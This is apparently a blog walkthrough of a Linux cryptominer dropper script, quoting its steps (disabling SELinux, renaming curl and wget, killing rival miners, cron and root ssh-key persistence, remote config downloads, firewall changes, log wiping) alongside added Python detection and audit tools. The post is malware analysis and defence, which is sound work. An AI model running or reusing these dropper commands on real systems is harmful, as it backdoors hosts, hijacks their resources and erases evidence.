How the database mining script is written

11-09-2023

01.Code 1

```sh
#! /bin/sh
```

The first line of the script looks like a comment, but it is not. It specifies which shell will be used to execute the rest of the script.

bash, zsh and the other shells we usually use are supersets of sh. Running under sh gives this script better portability.

02.Code 2

```sh
setenforce 0 2>dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
```

setenforce is the command that controls SELinux enforcement (SELinux is the kernel's mandatory access control layer, often loosely called a firewall). setenforce 0 switches it to permissive mode, which effectively turns it off, and the second line writes SELINUX=disabled into the config file so that it stays off after a reboot. The 2 stands for standard error (stderr).

So any error output from the command is discarded by redirecting it to the /dev/null device. This is a virtual device that swallows everything written to it. Perfect for doing bad things quietly.

03.Code 3

```sh
sync && echo 3 >/proc/sys/vm/drop_caches
```

This line thoughtfully frees up some memory, so that more resources are available for mining.

As we all know, a Linux system builds up a lot of cache during long-term operation; the way to clean it is to write a number into the drop_caches file, usually 3.

The sync command first flushes all unwritten system buffers to disk, so that the cache can be released safely afterwards.

04.Code 4

```sh
crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/sysupdates
rtdir="/etc/sysupdates"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/cur"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/wge"
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/xget /usr/bin/get
mv /usr/bin/get /usr/bin/wge
mv /usr/bin/curl /usr/bin/url
mv /usr/bin/xurl /usr/bin/url
mv /usr/bin/url /usr/bin/cur
```

That's right, the statements above only do some routine setup. What deserves attention is that it uses the mv command to rename a few commonly used commands: wget ends up as wge and curl as cur.

Walking through the commands, you find the script is divided into functional blocks. It modifies files on the machine, which already puts it in the category of a crime.

To reuse some functionality, the script abstracts many functions. Let's jump straight to the main function and follow its execution flow.

05.Code 5

The first is the kill_miner_proc function. The code is very long, so I won't post it all.

```sh
kill_miner_proc() {
    ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
    ...
    pkill -f biosetjenkins
    pkill -f Loopback
    ...
    crontab -r
    rm -rf /var/spool/cron/*
    ...
}
```

The mining business is a dog-eat-dog one. This function first uses a combination of ps, grep and kill to kill competitors' mining processes, then removes competitors' cron jobs. Black eats black.

The script also uses the pkill command, which terminates processes by name pattern (and with -t can even kick out a user by terminal number), which is more brutal.

06.Code 6

The next execution is the kill_sus_proc function.

```sh
ps axf -o "pid"|while read procid
do
    ...
done
```

ps with the -o option specifies which columns to output; here only the pid of each process is printed, and read is then used in a while loop to iterate over each procid.

07.Code 7

```sh
ls -l /proc/$procid/exe | grep /tmp
if [ $? -ne 1 ]
then
    ...
fi
```

The above is the body of the loop, and it shows the syntax of the if statement. $? refers to the exit status of the last command.

0 means success, and any other value means an error. grep exits 1 when "/tmp" is not found in the executable's path, and -ne means not equal to, so the block runs for every process whose executable lives under /tmp.

08.Code 8

```sh
ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid
do
    ...
done
```

Heh, another loop. This time the target is any process using more than 40% of the CPU. This is a bit cruel: it would affect my mining process, I'd die! What's the hurry?
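The two loops above turn "executable under /tmp" and "CPU above 40%" into kill criteria. The same observations are useful from the other side, as evidence to review rather than as a trigger to kill. The following is an added example, not part of the original post or of the analysed script; the ps output and the pid-to-executable map are constructed sample data, and the pool domain and port numbers are the ones that appear in the script's own snippets.

```python
import re

# Constructed sample in the column layout of `ps -eo pid,pcpu,args`; not real host data.
SAMPLE_PS = """\
  PID %CPU COMMAND
    1  0.0 /sbin/init
  842  0.3 /usr/sbin/sshd -D
 2311 97.5 /tmp/.x/sysupdate -o mine.moneropool.com:3333
 2350 45.2 /usr/bin/python3 /opt/batch/etl.py
 2399  0.1 bash
"""

# Constructed map pid -> target of /proc/<pid>/exe. On a live host this would be
# os.readlink(f"/proc/{pid}/exe"), the same thing the script's `ls -l /proc/$procid/exe` reads.
SAMPLE_EXE = {
    1: "/usr/lib/systemd/systemd",
    842: "/usr/sbin/sshd",
    2311: "/tmp/.x/sysupdate",
    2350: "/usr/bin/python3.11",
    2399: "/usr/bin/bash",
}

# Pool domain seen in kill_miner_proc plus the ports the script later firewalls.
POOL_PATTERNS = [r"moneropool\.com", r":(3333|5555|7777|9999)\b"]
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
CPU_THRESHOLD = 40.0  # same threshold the script uses, but here it only adds evidence


def parse_ps(text):
    """Parse `ps -eo pid,pcpu,args` output into dicts, skipping the header row."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, cpu, args = parts
        rows.append({"pid": int(pid), "cpu": float(cpu), "args": args})
    return rows


def triage(ps_text, exe_map):
    """Return suspicious processes with the reasons; never kills anything."""
    findings = []
    for row in parse_ps(ps_text):
        reasons = []
        exe = exe_map.get(row["pid"], "")
        if exe.startswith(SUSPICIOUS_DIRS):
            reasons.append("exe under temp dir: " + exe)
        if row["cpu"] >= CPU_THRESHOLD:
            reasons.append(f"cpu {row['cpu']}% >= {CPU_THRESHOLD}%")
        for pat in POOL_PATTERNS:
            if re.search(pat, row["args"]):
                reasons.append("pool indicator: " + pat)
                break
        if reasons:
            # high CPU alone (the batch job on pid 2350) is weak evidence: "review", not "high"
            severity = "high" if len(reasons) >= 2 else "review"
            findings.append({"pid": row["pid"], "args": row["args"],
                             "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_PS, SAMPLE_EXE):
        print(f["severity"], f["pid"], f["args"], "; ".join(f["reasons"]))
```

Note the difference from the script: the legitimate batch job at 45% CPU is reported for review, not killed, and the miner is rated high because three independent signals agree.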

09.Code 9

Next, the script performs different operations for different user attributes.

First, the root user. Whether the script has root privileges is determined by checking whether the $rtdir file exists.

```sh
chattr -i /etc/sysupdate*
chattr -i /etc/config.json*
chattr -i /etc/update.sh*
chattr -i /root/.ssh/authorized_keys*
chattr -i /etc/networkservice
```

Using chattr to mark key files immutable (+i) so that they cannot be modified unnecessarily is a wise security measure; here the script does the opposite, using -i to strip that attribute so it can overwrite those files. It then works on cron and adds its own update service to the schedule.

That is the following script.

10.Code 10

```sh
if [ ! -f "/usr/bin/crontab" ]
then
    echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir}
else
    [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab -
fi
```

Note the small piece `[[ $cont =~ "update.sh" ]]`, which looks rather odd. The shell builtin [[ ]] supports pattern matching on strings.

=~ matches against a regular expression, which makes it very powerful. Because its result is a true/false exit status, it can be chained with ||. (One caveat: [[ ]] is a bash/ksh extension rather than POSIX sh, so despite the #! /bin/sh line this only works where /bin/sh is actually bash.)

The parentheses ( ) after it form a command group: the commands inside are separated by semicolons, and the last one needs none. The effect is basically the same as running the commands one after another, and their combined output is piped into crontab -.
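The entry this block installs, `*/30 * * * * sh /etc/update.sh >/dev/null 2>&1`, has a recognisable shape: a short interval, an interpreter run on a script outside the normal cron directories, and all output silenced. The following is an added example that audits crontab text for that shape; it is not part of the original post or the analysed script, the sample crontab is constructed (only its second line is the entry shown above), and the directory list and 30-minute threshold are assumptions chosen to match the script.

```python
import re

# Constructed crontab text; line 2 is exactly the entry the analysed script installs.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
*/30 * * * * sh /etc/update.sh >/dev/null 2>&1
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * curl -fsSL http://example.invalid/x.sh | sh
@reboot /usr/local/bin/agent --daemon
"""

# five whitespace-separated schedule fields, or an @keyword, then the command;
# environment lines such as SHELL=/bin/sh do not match and are skipped
CRON_LINE = re.compile(r"^(?P<sched>(?:\S+\s+){5}|@\w+\s+)(?P<cmd>.+)$")
SCRIPT_DIRS = ("/etc/", "/tmp/", "/var/tmp/", "/dev/shm/")
INTERPRETERS = {"sh", "bash", "python", "python3", "perl"}
MAX_INTERVAL_MIN = 30  # the script schedules itself every 30 minutes


def minute_interval(sched):
    """Return N for a '*/N' minute field, None for any other schedule."""
    m = re.match(r"\*/(\d+)\s", sched)
    return int(m.group(1)) if m else None


def audit_crontab(text):
    """Flag crontab entries that look like the self-updating persistence seen above."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if not m:
            continue
        sched, cmd = m.group("sched"), m.group("cmd").strip()
        reasons = []
        interval = minute_interval(sched)
        if interval is not None and interval <= MAX_INTERVAL_MIN:
            reasons.append(f"runs every {interval} min")
        tokens = cmd.split()
        if tokens[0] in INTERPRETERS and len(tokens) > 1 and tokens[1].startswith(SCRIPT_DIRS):
            reasons.append(f"{tokens[0]} runs a script from {tokens[1]}")
        if re.search(r"\b(curl|wget|cur|wge)\b.*\|\s*(sh|bash)\b", cmd):
            reasons.append("pipes downloaded content into a shell")
        if re.search(r">\s*/dev/null\s+2>&1", cmd):
            reasons.append("discards all output")
        if reasons:
            findings.append({"line": n, "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']}: {f['command']}\n    " + "; ".join(f["reasons"]))
```

Feed it both `crontab -l` output and the per-user files under /var/spool/cron, since the script writes to whichever one it can reach. The renamed tools cur and wge are included in the pipe-to-shell check because the script calls them by those names.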

11.Code 11

Once the scheduled task is in place, the next step is to set up passwordless ssh login by appending a public key to the trusted list.

```sh
chmod 700 /root/.ssh/
echo >> /root/.ssh/authorized_keys
chmod 600 root/.ssh/authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/
```
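An appended authorized_keys entry is the one persistence step here that survives killing the miner and cleaning cron, so it is worth checking the file against a list of known key fingerprints. The following is an added example, not part of the original post or the analysed script: the key blobs are constructed base64 (not real keys), the allowlist is built from two of them, and the last line is deliberately cut short to mimic the truncated `echo` above.

```python
import base64
import hashlib

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def ssh_fingerprint(blob_b64):
    """SHA256 fingerprint in the form `ssh-keygen -lf` prints (unpadded base64)."""
    raw = base64.b64decode(blob_b64, validate=True)
    return "SHA256:" + base64.b64encode(hashlib.sha256(raw).digest()).decode().rstrip("=")


# Constructed key blobs: valid base64 so they can be fingerprinted, but not real keys.
KEY_ADMIN = base64.b64encode(b"constructed key bytes for the admin").decode()
KEY_OPS = base64.b64encode(b"constructed ed25519 key bytes for ops").decode()
KEY_UNKNOWN = base64.b64encode(b"constructed key bytes for an unknown party").decode()
KEY_TRUNCATED = KEY_UNKNOWN[:-6]  # a cut-off line, like the one the dropper writes

SAMPLE_AUTHORIZED_KEYS = f"""\
ssh-rsa {KEY_ADMIN} admin@bastion
from="10.0.0.0/8",no-pty ssh-ed25519 {KEY_OPS} ops@jumphost

ssh-rsa {KEY_UNKNOWN}
ssh-rsa {KEY_TRUNCATED}
"""

ALLOWLIST = {ssh_fingerprint(KEY_ADMIN), ssh_fingerprint(KEY_OPS)}


def parse_authorized_keys(text):
    """Split each line into options, key type, fingerprint and comment; record parse errors."""
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # the blank line the dropper appends with `echo >>` lands here
        parts = line.split()
        idx = 0 if parts[0].startswith(KEY_TYPE_PREFIXES) else 1  # leading options field?
        if len(parts) < idx + 2:
            entries.append({"line": n, "error": "too few fields"})
            continue
        entry = {"line": n, "options": parts[0] if idx else "", "type": parts[idx],
                 "comment": " ".join(parts[idx + 2:])}
        try:
            entry["fingerprint"] = ssh_fingerprint(parts[idx + 1])
        except ValueError:  # binascii.Error is a ValueError subclass
            entry["error"] = "undecodable key blob"
        entries.append(entry)
    return entries


def audit_authorized_keys(text, allowlist):
    """Return entries that are malformed or whose fingerprint is not in the allowlist."""
    findings = []
    for e in parse_authorized_keys(text):
        reasons = []
        if "error" in e:
            reasons.append(e["error"])
        elif e["fingerprint"] not in allowlist:
            reasons.append("fingerprint not in allowlist")
        if "error" not in e and not e["comment"]:
            reasons.append("no comment identifying the owner")
        if reasons:
            findings.append({"line": e["line"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, ALLOWLIST):
        print(f"line {f['line']}: " + "; ".join(f["reasons"]))
```

Comparing fingerprints rather than raw lines means a re-wrapped or re-commented copy of a known key still passes, while an unknown key is caught regardless of the comment it carries. The options-field handling is kept simple: an options string that itself contains spaces inside quotes would need a proper tokenizer.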

12.Code 12

Speak of the devil: the next snippet uses backticks `` to capture command output.

```sh
filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'`
if [ "$filesize_config" -ne "$config_size" ]
then
    pkill -f sysupdate
    rm /etc/config.json
    downloads $config_url /etc/config.json $config_url_backup
else
    echo "no need download"
fi
```

It obtains the size of the configuration file and, if the size does not match the expected value, downloads the file again. This is done through the downloads function.

Functions in the shell look a little odd: the arguments after the function name are passed positionally, just like arguments to a script, and are read as $1, $2, $3.

13.Code 13

```sh
downloads $config_url /etc/config.json $config_url_backup
```

This call passes three arguments. Of course, the file has to be downloaded from a remote server. We know nothing about it, except that the domain name ends in .de, which indicates a German domain.

```sh
downloads() {
    if [ -f "/usr/bin/curl" ]
    then
        echo $1, $2
        http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1`
        if [ "$http_code" -eq "200" ]
        then
            curl --connect-timeout 10 --retry 100 $1 > $2
        elif [ "$http_code" -eq "405" ]
        then
            curl --connect-timeout 10 --retry 100 $1 > $2
        else
            curl --connect-timeout 10 --retry 100 $3 > $2
        fi
    elif [ -f "/usr/bin/cur" ]
    then
        http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1`
        if [ "$http_code" -eq "200" ]
        then
            cur --connect-timeout 10 --retry 100 $1 > $2
        elif [ "$http_code" -eq "405" ]
        then
            cur --connect-timeout 10 --retry 100 $1 > $2
        else
            cur --connect-timeout 10 --retry 100 $3 > $2
        fi
    elif [ -f "/usr/bin/wget" ]
    then
        wget --timeout=10 --tries=100 -O $2 $1
        if [ $? -ne 0 ]
        then
            wget --timeout=10 --tries=100 -O $2 $3
        fi
    elif [ -f "/usr/bin/wge" ]
    then
        wge --timeout=10 --tries=100 -O $2 $1
        if [ $? -eq 0 ]
        then
            wge --timeout=10 --tries=100 -O $2 $3
        fi
    fi
}
```

I think this code is poorly written and very long, which does not reflect the author's actual level. It was probably rushed to meet a deadline; without any thought given to code reuse, it turned out this badly.

As mentioned above, the script renamed several commands, including curl. curl is so powerful that the script author had to pass it quite a few options:

-I: request only the HTTP headers (a HEAD request), used here to test whether the URL answers.

-m: the maximum time the whole transfer may take.

-o: the file to write the response to. Here it is /dev/null, uh, uh, uh ......

-s: silent mode, no progress output.

-w %{http_code}: print only the HTTP status code, which is what gets captured into http_code.

--connect-timeout: the connection timeout.

--retry: number of retries. That's tough, 100 times.

No curl? Then it falls back to wget, and the routine is the same.

14.Code 14

This is followed by a series of similar operations, and finally a batch of iptables commands. They flush all existing rules, drop outbound TCP to ports 3333, 5555, 7777 and 9999 (presumably to cut off competing miners' pool connections), and drop inbound traffic from 43.245.222.57.

```sh
iptables -F
iptables -X
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
iptables -I INPUT -s 43.245.222.57 -j DROP
service iptables reload
```

15.Code 15

The careful script writer also cleans up the operation logs: the shell history, root's mailbox, the login records in wtmp and the authentication log in secure.

```sh
history -c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history
```
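Taken together, the steps walked through in this post (disabling SELinux, dropping caches, renaming curl and wget, killing competitors, stripping immutable bits, cron and ssh-key persistence, firewall changes and log wiping) form a profile that is easy to match in a dropped script before it ever runs. The following is an added example that scans shell-script text for those behaviours; it is not part of the original post or the analysed script. The signatures are written from the snippets shown above, the sample dropper is assembled from those same snippets with a placeholder in place of the ssh key, and the benign deploy script and the three-group scoring rule are constructed assumptions.

```python
import re

# Behaviour signatures, each drawn from one step of the dropper walked through above.
SIGNATURES = [
    ("disable_selinux", r"\bsetenforce\s+0\b|SELINUX=disabled"),
    ("drop_caches", r">\s*/proc/sys/vm/drop_caches"),
    ("rename_download_tools", r"\bmv\s+/usr/bin/(curl|wget)\b"),
    ("kill_competitors", r"\bkill\s+-9\b|\bpkill\s+-f\b"),
    ("wipe_crontab", r"\bcrontab\s+-r\b|rm\s+-rf\s+/var/spool/cron"),
    ("remove_immutable", r"\bchattr\s+-i\b"),
    ("cron_persistence", r"\*/\d+(\s+\*){4}.*\|\s*crontab\s+-|>>\s*\$\{?crondir"),
    ("ssh_key_persistence", r">>\s*/root/\.ssh/authorized_keys"),
    ("firewall_flush", r"\biptables\s+-[FX]\b"),
    ("block_pool_ports", r"--dport\s+(3333|5555|7777|9999)\b"),
    ("anti_forensics", r"\bhistory\s+-c\b|echo\s*>\s*/var/log/(wtmp|secure)\b|echo\s*>\s*/root/\.bash_history"),
]

PERSISTENCE = {"cron_persistence", "ssh_key_persistence"}
EVASION = {"disable_selinux", "remove_immutable", "rename_download_tools", "anti_forensics"}
INTERFERENCE = {"kill_competitors", "wipe_crontab", "firewall_flush", "block_pool_ports"}

# Constructed sample assembled from the snippets quoted in this post; the ssh key is a placeholder.
SAMPLE_DROPPER = """\
#! /bin/sh
setenforce 0 2>/dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/curl /usr/bin/url
pkill -f biosetjenkins
crontab -r
chattr -i /etc/update.sh*
(crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab -
echo "ssh-rsa AAAA-PLACEHOLDER-KEY" >> /root/.ssh/authorized_keys
iptables -F
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
history -c
echo > /var/log/wtmp
"""

# Constructed benign script for comparison.
BENIGN_SCRIPT = """\
#!/bin/sh
set -e
systemctl restart nginx
echo "deployed $(date)" >> /var/log/deploy.log
"""


def scan_script(text):
    """Map signature name -> line numbers where it fires."""
    hits = {}
    for n, line in enumerate(text.splitlines(), 1):
        for name, pattern in SIGNATURES:
            if re.search(pattern, line):
                hits.setdefault(name, []).append(n)
    return hits


def verdict(hits):
    """Crude scoring: persistence, evasion and interference together is the dropper profile."""
    present = set(hits)
    groups = sum(1 for g in (PERSISTENCE, EVASION, INTERFERENCE) if g & present)
    if groups == 3:
        return "likely cryptominer dropper"
    return "suspicious" if groups else "no indicators"


if __name__ == "__main__":
    hits = scan_script(SAMPLE_DROPPER)
    for name, lines in hits.items():
        print(f"{name}: lines {lines}")
    print(verdict(hits))
    print(verdict(scan_script(BENIGN_SCRIPT)))
```

Individual signatures such as `chattr -i` or `iptables -F` appear in plenty of legitimate administration scripts, which is why the verdict only fires when all three behaviour groups are present; a single group is reported as merely suspicious for a human to look at.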
